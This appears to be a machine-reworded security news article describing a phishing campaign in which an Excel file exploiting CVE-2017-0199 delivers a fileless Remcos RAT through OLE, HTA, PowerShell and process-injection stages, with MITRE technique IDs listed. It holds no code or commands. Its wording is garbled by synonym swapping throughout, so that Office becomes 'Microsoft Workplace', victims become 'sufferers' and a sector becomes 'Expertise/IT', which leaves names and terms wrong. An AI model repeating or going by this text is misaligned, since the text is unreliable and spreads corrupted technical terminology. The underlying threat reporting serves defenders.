A current superior malware marketing campaign leverages a phishing assault to ship a seemingly benign Excel file that exploits CVE-2017-0199.
By exploiting this vulnerability in Microsoft Workplace, attackers are capable of embed malicious code inside the file utilizing OLE objects.
It makes use of encryption and obfuscation methods to hide the malicious payload. Upon opening the file, the sufferer’s system executes a fileless variant of the Remcos RAT, granting attackers distant entry and management.
The malware marketing campaign leverages the CVE-2017-0199 vulnerability to ship a Remcos RAT by way of a phishing electronic mail containing an encrypted Excel file.
Decoding Compliance: What CISOs Must Know – Be part of Free Webinar
The assault chain entails OLE object exploitation, HTA software execution, and PowerShell instructions to inject the RAT right into a legit course of, which has been exploited by varied malware households, together with LATENTBOT, FINSPY, and WingBird/FinFisher.
Latest campaigns in 2024 deploying RevengeRAT, SnakeKeylogger, GuLoader, AgentTesla, and FormBook have focused Authorities, Manufacturing, Expertise/IT, and Banking sectors, primarily in Belgium, Japan, america, South Korea, Canada, Germany, and Australia.
It leverages a spearphishing attachment to entice victims into opening a misleading Excel doc, which exploits a vulnerability (CVE-2017-0199) to execute embedded OLE objects, which include a malicious URL.
This URL initiates a connection to a malicious server, downloading and executing a weaponized HTA file, finally compromising the sufferer’s system.
The Excel file exploits CVE-2017-0199 to ship a malicious HTA software, which in flip executes a PowerShell script that downloads and runs a VBScript from a distant URL, which incorporates obfuscated information that’s decoded and executed by PowerShell, initiating a sequence of PowerShell processes to escalate the assault.
Whereas the ultimate course of downloads a JPEG file containing a base64-encoded ‘dnlib.dll’ library, which is decoded and loaded into reminiscence for additional malicious exercise by leveraging varied methods to evade detection and obtain persistence within the goal surroundings.
The assault begins with PowerShell downloading a base64-encoded textual content file from a malicious URL after which processed by ‘dnlib.dll’ to create a .NET meeting of Remcos RAT, which is subsequently injected into the legit course of ‘RegAsm’.
Based on Trellix, Remcos RAT then establishes persistence by injecting itself into different legit processes, evading conventional safety defenses.
Indicators of Remcos RAT presence embrace its keylogger file and related IOCs, which make the most of the MITRE ATT&CK methods T1055.001, T1027, T1543.003, and T1071.001.
Attackers used a mixture of superior methods to create a persistent menace by leveraging a vulnerability (CVE-2017-0199) in Microsoft Workplace to execute malicious code.
It then downloaded extra instruments like OLE objects, memory-only .NET assemblies, and scripts (.hta, vbs.txt) from compromised servers, which probably helped the attackers preserve persistence on the contaminated system and probably steal information.
Simulating Cyberattack Eventualities With All-in-One Cybersecurity Platform – Watch Free Webinar